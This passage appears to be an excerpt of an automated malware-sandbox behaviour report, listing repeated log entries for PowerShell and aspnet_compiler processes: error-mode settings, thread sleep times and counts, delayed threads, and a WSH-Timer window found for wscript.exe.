        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6424Thread sleep time: -17524406870024063s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7028Thread sleep count: 2648 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6936Thread sleep count: 421 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6820Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6820Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep count: 36 > 30Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -33204139332677172s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -67255s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6440Thread sleep count: 4538 > 30Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -67115s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6440Thread sleep count: 5209 > 30Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep count: 45 > 30Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -66958s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -66802s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -66661s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -66505s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -66365s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -66208s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -66052s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -65911s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -65755s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -65615s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -65458s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -65302s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -65161s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -65005s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -64865s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -64708s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -64552s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -64411s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -64255s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -64115s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -63958s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -63802s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -63662s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -63505s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -63356s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -63207s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -63080s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -62958s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -62800s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -62658s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -62533s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -62415s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -62303s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -62157s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -62036s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -61895s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -61616s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -61418s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -61263s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -61024s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -60907s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -60772s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -60607s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -60434s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -60318s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -59504s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -59343s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -59217s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -59092s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -56975s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -56839s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -56654s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -56541s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -56422s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368Thread sleep time: -56300s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5896Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3545Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2648Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 421Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 4538Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 5209Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
